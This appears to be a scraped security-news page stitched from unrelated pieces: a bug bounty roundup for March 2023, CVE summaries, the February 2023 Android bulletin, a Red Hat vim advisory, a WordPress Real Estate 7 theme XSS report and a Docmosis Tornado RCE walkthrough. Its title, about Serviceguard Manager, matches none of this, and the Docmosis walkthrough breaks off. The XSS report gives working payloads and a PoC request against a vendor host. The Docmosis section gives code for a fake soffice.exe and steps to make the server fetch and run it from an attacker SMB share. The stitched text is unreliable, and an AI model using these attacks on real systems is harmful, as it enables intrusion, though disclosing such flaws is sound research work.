Unauthenticated Java deserialization vulnerability in Serviceguard Manager

CVE-2022-37936

New web targets for the discerning hacker

New web targets for the discerning hacker

Belgium became a haven for ethical hackers following the adoption of a nationwide safe harbor agreement last month.

The framework means that well-intentioned security researchers are free from legal jeopardy when they come to report computer security vulnerabilities in any system located in the European country – providing they follow a strict set of conditions and rules of conduct.

The guidelines, announced by the Centre for Cyber Security Belgium, apply to both private and public sector organizations. Belgium is further ahead on the curve, but it’s hoped that the scheme will inspire other countries to follow suit and companies to roll out vulnerability disclosure programs of their own.

In less congenial bug bounty-related news, independent researcher Peter Geissler publicly released the details of a set of vulnerabilities affecting Lexmark printers rather than accepting what he considered a derisory reward. The security bugs – which could be chained together to create a remote code execution attack – have since been fixed.

Another example of researchers baulking at bug bounty conditions came in the disclosure of a web security flaw in a marketing widget from analysts Gartner.

Security researcher Justin Steven wanted to write-up the technical details of a DOM-based cross-site scripting vulnerability in the Gartner Peer Insights widget, but the analyst firm warned the researcher that that it violated the rules of the private bug bounty program.

Steven publicly disclosed technical details of the vulnerability anyway, even though this meant he went without payment for the find.

There was drama aplenty when a new host of popular hacking tool XSS Hunter disclosed telemetry (anonymized statistics about the vulnerabilities unearthed) from security researchers using its version of the utility. Truffle Security faced a privacy backlash from security researchers upset that it was seemingly “peering over their shoulder” and going through their findings.

In response to the criticism, Truffle Security began offering end-to-end encryption as an option to security researchers using its version of XSS Hunter.

**The latest bug bounty programs for March 2023**

The past month saw the arrival of several new bug bounty programs. Here’s a list of the latest entries:

**ATG (Enhanced)**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**ATG has raised rewards for medium, high, and critical bugs, and broadened its scope to encompass .atg.se and its subdomains. ATG is a Swedish gaming company that specializes in horse racing.

Check out the ATG bug bounty page for more details

**Bybit**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$20,000

**Outline:  
**The cryptocurrency exchange is paying out between $5,000 and $20,000 for the highest tier of criticality. The sole target in scope is bybit.com.

Check out the Bybit bug bounty page for more details

**Grindr**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$4,000

**Outline:  
**The location-based social networking and dating application for the LGBTQ community cites RCE, arbitrary SQL queries on production databases, and significant authentication bypass flaws as potentially critical bugs.

Check out the Grindr bug bounty page for more details

**Linktree**

**Program provider:  
**Bugcrowd

**Program type:  
**Public

**Max reward:  
**$7,500

**Outline:  
**Australian social media tool Linktree, which has 30 million users globally, has put “most” of its assets within the scope of the bug bounty program.

Check out the Linktree bug bounty page for more details

**Malwarebytes**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$2,000

**Outline:  
**The anti-malware firm is offering payouts of between $50 and $2,000 for confirmed vulnerabilities. Those posing an RCE risk to Malwarebytes’ web properties or customers running its endpoint protection software, or leading to the takeover of AWS cloud infrastructure, will attract the greatest rewards.

Check out the Malwarebytes bug bounty page for more details

**Miro**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**The collaborative whiteboarding platform is offering rewards of up to $3,000. Out of scope assets include Jira Cards by Miro, Miro for Confluence, and Miro for Jira Cloud.

Check out the Miro bug bounty page for more details

**Ninja Kiwi Games**

**Program provider:  
**Intigriti

**Program type:  
**Public

**Max reward:  
**$3,750

**Outline:  
**The New Zealand-based video game developer has launched a second bug bounty program after a successful 2021 forerunner. Ninja Kiwi Games has created the Bloons, Bloons TD, and SAS: Zombie Assault franchises.

Check out the Ninja Kiwi Games bug bounty page for more details

**QNAP**

**Program provider:  
**Independent

**Program type:  
**Public

**Max reward:  
**Undisclosed

**Outline:  
**QNAP, the Taiwanese manufacturer of network-attached storage appliances, has invited hackers to probe its operating systems, applications, and cloud services for vulnerabilities.

Check out the QNAP bug bounty page for more details

**Skinport**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$6,000

**Outline:  
**Skinport, a marketplace for digital in-game items, has launched a program with rewards for critical flaws that open the door to trading or purchase manipulations. Vulnerabilities that result in unauthorized access to project servers or the disclosure of confidential data are also within scope.

Check out the Skinport bug bounty page for more details

**Spin by OXXO**

**Program provider:  
**YesWeHack

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**In scope are an API plus iOS and Android mobile applications of Spin, a fintech app and payment card from Mexican convenience store chain Oxxo.

Check out the Spin by OXXO bug bounty page for more details

**Xdefi Technologies**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$5,000

**Outline:  
**Xdefi, a cross-chain wallet extension for cryptocurrencies and NFTs, has included in the in-scope assets Xdefi Extension (Chromium web extension) and app, with rewards based on severity as per the CVSS (the Common Vulnerability Scoring Standard).

Check out the Xdefi bug bounty page for more details

**Zabbix**

**Program provider:  
**HackerOne

**Program type:  
**Public

**Max reward:  
**$3,000

**Outline:  
**Zabbix, a vendor which provides open source infrastructure monitoring technologies, is offering up to $1,000 for high severity bugs and $3,000 for critical flaws.

Check out the Zabbix bug bounty page for more information

**Other bug bounty and VDP news this month**

*   Google has expanded its OSS Fuzz code testing service by upgrading its reward program and increasing the number of computing languages covered by the project
*   The search engine giant has also paid out its largest-ever bug bounty – worth a potentially life-changing £500,000 ($605,000) – for an Android\-related vulnerability. Google is staying tight-lipped about the details of the flaw but ITPro has narrowed down the list of possibilities
*   Intel reports that it paid out $935,000 in bug bounties last year. The chip giant’s Intel Product Security Report (pdf) said that it triaged 243 vulnerabilities in 2022, 90 of which were discovered by security researchers and reported through its bug bounty programs. The vendor “engaged 151 researchers last year, more than double compared to the previous three years”, Security Week reports.
*   An in-depth article on the YesWeHack blog by security researchers BitK and SakiiR offers a technical perspective on detecting and exploiting prototype pollution vulnerabilities in JavaScript. The research builds on earlier work by Portswigger’s Gareth Heyes on detecting server-side prototype pollution-type security flaws.
*   Security researcher Mike Takahashi has put together a Twitter thread on the so-hot topic of how AI-powered chatbots such as ChatGPT might be able to assist bug bounty hunters. The social media “brainstorm” by Takahashi is the second part in what might become an ongoing series.

Additional reporting by Adam Bannister

PREVIOUS EDITION Bug Bounty Radar // The latest bug bounty programs for February 2023

Bug Bounty Radar // The latest bug bounty programs for March 2023

A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.

To use PolyGerrit, please enable JavaScript in your browser settings, and then refresh this page.

CVE-2022-41723

An attacker can craft a malformed TIFF image which will consume a significant amount of memory when passed to DecodeConfig. This could lead to a denial of service.

CVE-2022-41727

WordPress Real Estate 7 Theme versions 3.3.4 and below suffer from a cross site scripting vulnerability.

    ==== [ Z://USB-00_RESEARCH/WORDPRESS/ ] ============================================= [ 2023 ] ==Report Title:        WordPress Real Estate 7 Theme <= 3.3.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)Google Dork:         inurl:/wp-content/themes/realestate-7/Research Date:       2023-02-10Researcher:          FearZzZz [ https://fearzzzz.ru ]Component Vendor:    Contempo Themes [ https://contempothemes.com ]Vulnerable Version:  <= 3.3.4Component Link:      https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778CVSS Base Score:     6.1 (Medium)CVSS Vector String:  CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:NOWASP Top 10:        A7: Cross-Site Scripting (XSS)CWE:                 CWE-79CVE:                 TBA=================================================================================================#### [ Description: ]The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.#### [ Impact: ]Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.#### [ Payloads: ]```<img src=x onerror=(alert)(`FearZzZz`);>``````<svg/onload=alert(`FearZzZz`)>```#### [ Proof-of-Concept: ]https://elementor3.contempothemes.com/?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3EGET /?ct_mobile_keyword&ct_keyword=Z&ct_zipcode&search-listings=true&ct_additional_features%5B0%5D=central-forced-air%3Csvg%2Fonload%3Dalert%28%60FearZzZz%60%29%3E HTTP/2Host: elementor3.contempothemes.com#### [ Timeline: ]2023.02.08 - Real Estate 7 Theme v3.3.4 released.2023.02.10 - Vulnerability has been discovered.2023.02.13 - Vendor notified, received a quick response.2023.02.13 - Real Estate 7 Theme v3.3.5 released, the vulnerability has been fixed.#### [ Contacts: ]Website:   fearzzzz.ruEmail:     fearzzzz@tutanota.comTwitter:   https://twitter.com/fear_zzzzMedium:    https://fearzzzz.medium.comGitHub:    https://github.com/fearzzzzYouTube:   https://youtube.com/@fearzzzz#### [ Notes: ]Special thanks to Chris Robinson (Contempo Themes Founder & CEO) for the quick response and for the respectful communication.#### [ Disclaimer: ]The information provided in this report is provided "as is" without warranty of any kind. FearZzZz disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall FearZzZz be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if FearZzZz have been advised of the possibility of such damages.========================================================================== [ www.fearzzzz.ru ] ==

WordPress Real Estate 7 Theme 3.3.4 Cross Site Scripting

In addAutomaticZenRule of ZenModeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-10 Android-11 Android-12 Android-12L Android-13Android ID: A-242537431

_Published February 6, 2023 | Updated February 8, 2023_

The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of 2023-02-05 or later address all of these issues. To learn how to check a device's security patch level, see Check and update your Android version.

Android partners are notified of all issues at least a month before publication. Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletin. This bulletin also includes links to patches outside of AOSP.

The most severe of these issues is a high security vulnerability in the Framework component that could lead to local escalation of privilege with no additional execution privileges needed. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed.

Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform.

**Android and Google service mitigations**

This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android.

*   Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible.
*   The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play.

**2023-02-01 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-02-01 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Devices with Android 10 and later may receive security updates as well as Google Play system updates.

**Framework**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2020-27059

A-159249069

EoP

High

12, 12L

CVE-2022-20443

A-194480991 \[2\]

EoP

High

11, 12, 12L

CVE-2022-20551

A-243376549

EoP

High

12, 12L, 13

CVE-2023-20934

A-258672042 \[2\]

EoP

High

12, 12L, 13

CVE-2023-20942

A-258021433

EoP

High

12, 12L, 13

CVE-2023-20943

A-240267890

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20944

A-244154558

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20948

A-230630526

ID

High

12, 12L, 13

**Media Framework**

The vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20933

A-245860753

EoP

High

10, 11, 12, 12L, 13

**System**

The most severe vulnerability in this section could lead to remote code execution with no additional execution privileges needed.

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2022-43680

A-255449293

EoP

High

10, 11, 12, 12L, 13

CVE-2023-20939

A-243362981

EoP

High

12, 12L, 13

CVE-2023-20940

A-256237041

EoP

High

13

CVE-2023-20945

A-246932269

EoP

High

10

CVE-2023-20946

A-244423101

EoP

High

11, 12, 12L, 13

CVE-2022-20481

A-241927115

ID

High

10, 11, 12, 12L, 13

CVE-2023-20932

A-248251018

ID

High

10, 11, 12, 12L, 13

CVE-2022-20455

A-242537431 \[2\] \[3\] \[4\] \[5\]

DoS

High

10, 11, 12, 12L, 13

**Google Play system updates**

The following issues are included in Project Mainline components.

 

Subcomponent

CVE

WiFi

CVE-2022-20481

**2023-02-05 security patch level vulnerability details**

In the sections below, we provide details for each of the security vulnerabilities that apply to the 2023-02-05 patch level. Vulnerabilities are grouped under the component they affect. Issues are described in the tables below and include CVE ID, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Kernel**

The most severe vulnerability in this section could lead to local escalation of privilege with no additional execution privileges needed.

    

CVE

References

Type

Severity

Subcomponent

CVE-2022-39189

A-245869446  
Upstream kernel

EoP

High

KVM

CVE-2022-39842

A-245928838  
Upstream kernel

EoP

High

Video

CVE-2022-41222

A-248354871  
Upstream kernel

EoP

High

Kernel memory subsystem

CVE-2023-20937

A-257443051  
Upstream kernel \[2\] \[3\] \[4\] \[5\] \[6\] \[7\]

EoP

High

Memory Management

CVE-2023-20938

A-257685302  
Upstream kernel \[2\] \[3\] \[4\] \[5\] \[6\]

EoP

High

Binder

CVE-2022-0850

A-245406696  
Upstream kernel

ID

High

ext4

**MediaTek components**

This vulnerability affects MediaTek components and further details are available directly from MediaTek. The severity assessment of this issue is provided directly by MediaTek.

    

CVE

References

Severity

Subcomponent

CVE-2023-20602  

A-261367136  
M-ALPS07494107 \*

High

ged

**Unisoc components**

These vulnerabilities affect Unisoc components and further details are available directly from Unisoc. The severity assessment of these issues is provided directly by Unisoc.

    

CVE

References

Severity

Subcomponent

CVE-2022-47331  

A-262503737  
U-1946329 \*

High

Kernel

CVE-2022-47339  

A-262503731  
U-2029419 \*

High

Android

**Qualcomm components**

These vulnerabilities affect Qualcomm components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Subcomponent

CVE-2022-33243  

A-245402502  
QC-CR#3217329

Critical

Kernel

CVE-2022-33280  

A-250627584  
QC-CR#3040964 \[2\] \[3\]

Critical

Bluetooth

**Qualcomm closed-source components**

These vulnerabilities affect Qualcomm closed-source components and are described in further detail in the appropriate Qualcomm security bulletin or security alert. The severity assessment of these issues is provided directly by Qualcomm.

    

CVE

References

Severity

Subcomponent

CVE-2022-33232  

A-240972480 \*

Critical

Closed-source component

CVE-2022-40514  

A-258057252 \*

Critical

Closed-source component

CVE-2022-33221  

A-240972893 \*

High

Closed-source component

CVE-2022-33233  

A-240972514 \*

High

Closed-source component

CVE-2022-33248  

A-240972595 \*

High

Closed-source component

CVE-2022-33271  

A-258057374 \*

High

Closed-source component

CVE-2022-33277  

A-258057281 \*

High

Closed-source component

CVE-2022-33306  

A-258057409 \*

High

Closed-source component

CVE-2022-34145  

A-258057258 \*

High

Closed-source component

CVE-2022-34146  

A-258057317 \*

High

Closed-source component

CVE-2022-40502  

A-258057203 \*

High

Closed-source component

CVE-2022-40512  

A-258057239 \*

High

Closed-source component

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

To learn how to check a device's security patch level, see Check and update your Android version.

*   Security patch levels of 2023-02-01 or later address all issues associated with the 2023-02-01 security patch level.
*   Security patch levels of 2023-02-05 or later address all issues associated with the 2023-02-05 security patch level and all previous patch levels.

Device manufacturers that include these updates should set the patch string level to:

*   \[ro.build.version.security\_patch\]:\[2023-02-01\]
*   \[ro.build.version.security\_patch\]:\[2023-02-05\]

For some devices on Android 10 or later, the Google Play system update will have a date string that matches the 2023-02-01 security patch level. Please see this article for more details on how to install security updates.

**2\. Why does this bulletin have two security patch levels?**

This bulletin has two security patch levels so that Android partners have the flexibility to fix a subset of vulnerabilities that are similar across all Android devices more quickly. Android partners are encouraged to fix all issues in this bulletin and use the latest security patch level.

*   Devices that use the 2023-02-01 security patch level must include all issues associated with that security patch level, as well as fixes for all issues reported in previous security bulletins.
*   Devices that use the security patch level of 2023-02-05 or newer must include all applicable patches in this (and previous) security bulletins.

Partners are encouraged to bundle the fixes for all issues they are addressing in a single update.

**3\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**4\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**5\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the corresponding reference ID. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**6\. Why are security vulnerabilities split between this bulletin and device / partner security bulletins, such as the Pixel bulletin?**

Security vulnerabilities that are documented in this security bulletin are required to declare the latest security patch level on Android devices. Additional security vulnerabilities that are documented in the device / partner security bulletins are not required for declaring a security patch level. Android device and chipset manufacturers may also publish security vulnerability details specific to their products, such as Google, Huawei, LGE, Motorola, Nokia, or Samsung.

**Versions**

  

Version

Date

Notes

1.0

February 6, 2023

Bulletin Published

1.1

February 8, 2023

Bulletin revised to include AOSP links

CVE-2022-20455: Android Security Bulletin—February 2023

Relative Path Traversal vulnerability in ForgeRock Access Management Java Policy Agent allows Authentication Bypass.This issue affects Access Management Java Policy Agent: from 1.0.0 through 5.10.1.

CVE-2023-0511: Downloads - BackStage

Red Hat Security Advisory 2023-0958-01 - Vim is an updated and improved version of the vi editor.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: vim security update  
Advisory ID:       RHSA-2023:0958-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0958  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-47024   
=====================================================================

1. Summary:

An update for vim is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Vim (Vi IMproved) is an updated and improved version of the vi editor.

Security Fix(es):

* vim: no check if the return value of XChangeGC() is NULL (CVE-2022-47024)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2163613 - CVE-2022-47024 vim: no check if the return value of XChangeGC() is NULL

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
vim-X11-8.2.2637-20.el9_1.aarch64.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debugsource-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.aarch64.rpm

ppc64le:  
vim-X11-8.2.2637-20.el9_1.ppc64le.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debugsource-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm

s390x:  
vim-X11-8.2.2637-20.el9_1.s390x.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-common-8.2.2637-20.el9_1.s390x.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debugsource-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.s390x.rpm

x86_64:  
vim-X11-8.2.2637-20.el9_1.x86_64.rpm  
vim-X11-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debugsource-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
vim-8.2.2637-20.el9_1.src.rpm

aarch64:  
vim-X11-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-debugsource-8.2.2637-20.el9_1.aarch64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-8.2.2637-20.el9_1.aarch64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.aarch64.rpm

noarch:  
vim-filesystem-8.2.2637-20.el9_1.noarch.rpm

ppc64le:  
vim-X11-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-debugsource-8.2.2637-20.el9_1.ppc64le.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-8.2.2637-20.el9_1.ppc64le.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.ppc64le.rpm

s390x:  
vim-X11-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-debugsource-8.2.2637-20.el9_1.s390x.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-8.2.2637-20.el9_1.s390x.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.s390x.rpm

x86_64:  
vim-X11-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-common-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-debugsource-8.2.2637-20.el9_1.x86_64.rpm  
vim-enhanced-debuginfo-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-8.2.2637-20.el9_1.x86_64.rpm  
vim-minimal-debuginfo-8.2.2637-20.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-47024  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zu9zjgjWX9erEAQjjqw//RfPjkA9+ULyz/haWxVeFiOp4pKtsrL6l  
Zbah1fUhP4U+JrjzxGTrRPGpNXDlxV6xm8Po79jk7VfsZ2VekOaspp/hCqs7PQbW  
8Wc7jkPpUh9Lk0elFvvyxIQ6OZEjT+pfTvu0orbLC4cJwAbM7cylT/uZlBiMqQWQ  
FDETC9NzwZkKtOL6Nw+r04Qa1VEszWM17wbGWboMT2abXgLT/C/sGOcGh7id+Jbr  
7NEuzrG18lq1jRTSWU72Pmz+Vxd0mk4mwS2YcZh9uYDLYOcKcDOWQzQH1Y341fO3  
ZcsKNCtrW1ZTqXcZYiv/4Tn4ttELdM0Rt+SiOnE7H6G1GA3FCo4NmBk9mx8BQX10  
r9I+TJllCAM1zr/HVIA95oWpji2np7cT3fxzMwkor5OBlGsVukFws4ZabEWgO/Jo  
I6rLp6Ips+KA73chHAGCdbz3bAjcfFJMqPoxFKS0XGh7d1lT6+zGax1NhsJDkIdM  
TG1SwtA54UeaQboKPLdQTKXiAlNA6hG0cc5g0PKvwpGKrVNb/g+rB5lMhhNq0lkC  
53mSm9fB5IZPsjJB3qYDvhKFUhfrBKZZtlZ0rc4+g7AyOGqx48QaJb2u5MgXg512  
ZXYDMWsZdgT9s9mIUNgKRmIj1z+qnrmX21XTFqvpn6Fb6Ss5CT7HCaUwkKkwWj2O  
4nohN9fIiz4=  
=Evof  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0958-01

An issue was discovered in Docmosis Tornado prior to version 2.9.5. An authenticated attacker can change the Office directory setting pointing to an arbitrary remote network path. This triggers the execution of the soffice binary under the attackers control leading to arbitrary remote code execution (RCE).

Recently, I did a non-exhaustive security product review on a Document Generator Engine, named **Docmosis**. A system I targeted used **Docmosis Tornado** in its latest version **2.9.4**. I’ll give you a walkthrough based on my local lab installation with a Proof-of-Concept exploitation on an on-premises system belonging to a specialized agency of the United Nations.

By default, no login is needed to access the web UI :-0. But as we’ll see, even if the password protection is enabled/configured, there is an **Authentication Bypass** which makes all these findings exploitable from an **unauthenticated context** as well. But let’s go through all the findings step by step.

**Remote Code Execution**

This first vulnerability relies on the fact that the web UI field **“Open/Libre Office location”** can be changed, pointing to the _LibreOffice_ installation directory. All configuration changes are persisted after the corresponding _GWT-based_ HTTP POST request is sent to /webserverdownload/configure. The corresponding URL mapping can be found in the web descriptor web.xml.

    <servlet-mapping>
      <servlet-name>ConfigurationServlet</servlet-name>
      <url-pattern>/webserverdownload/configure</url-pattern>
    </servlet-mapping>
    ...
    <servlet>
      <servlet-name>ConfigurationServlet</servlet-name>
      <servlet-class>com.docmosis.webserver.server.ConfigurationServiceImpl</servlet-class>
    </servlet>
    

The responsible Java interface extends com.google.gwt.user.server.rpc.RemoteServiceServlet, finally leading to the implementing class com.docmosis.webserver.server.ConfigurationServiceImpl. The method com.docmosis.webserver.server.ConfigurationServiceImpl.saveConfiguration(ConfigBean) is called then with the parameters given in the request. There exists a validation method com.docmosis.webserver.server.ConfigurationServiceImpl.serverSideValidate(ConfigBean) which checks access to the Office location directory.

    String[] expectedFolders = DMProperties.getStringArray("docmosis.openoffice.location.binary.searchpath", ";");
    boolean subFolderFound = false;
    for (String expected : expectedFolders) {
      File subFolder = new File(officePathFile, expected);
      if (subFolder.canRead() && subFolder.isDirectory()) {
        subFolderFound = true;
        
        break;
      } 
    } 
    

The expectedFolders member seems to be used to check for expected folders matching a valid Office installation. The same is done for the Template directories etc. No further validations with respect to security are done. On a standard Windows installation, an **UNC network share path** could be used to point the Office directory to a remote host. The Office executable soffice.exe is used for converter functions etc. and therefore is observable in the process tree of Docmosis Tornado after being started.

Now, changing the **Open/Libre Office location** value to a remote network share path allows to load an **arbitrary malicious .exe file** named soffice.exe instead. After a restart of Docmosis Tornado, this would be fetched and executed, allowing an attacker to executing arbitrary code on the targeted machine. This already is a critical vulnerability in itself but **requires user interaction** on the server-side for the _restart_. **The web UI does not provide any restart functions**. Looking again at the GWT service implementation, we find the method com.docmosis.webserver.server.ConfigurationServiceImpl.restartServer() which indeed allows exactly this via a properly crafted GWT HTTP request. This makes the **user interaction restriction obsolete**. To following steps have to be taken to prove the Remote Code Execution (RCE).

*   We create a “malicious” soffice.exe file with a C cross compiler with the following code underneath.

    void main()
    {
    	system("cmd.exe /C calc");
    }
    

*   We mimick the directory/file structure of a valid LibreOffice installation on our remote attacker server.
    
*   We provide a fake SMB server with help of the impacket suite.
    
*   We change the Office location in the web UI pointing to this server \\10.137.0.16\myshare\LibreOffice.
    

*   We observe NTLM authentication on our fake SMB server.

*   We trigger the restart of the Tornado service and got code execution, i.e. our malicious soffice.exe got executed, popping a Windows calculator.

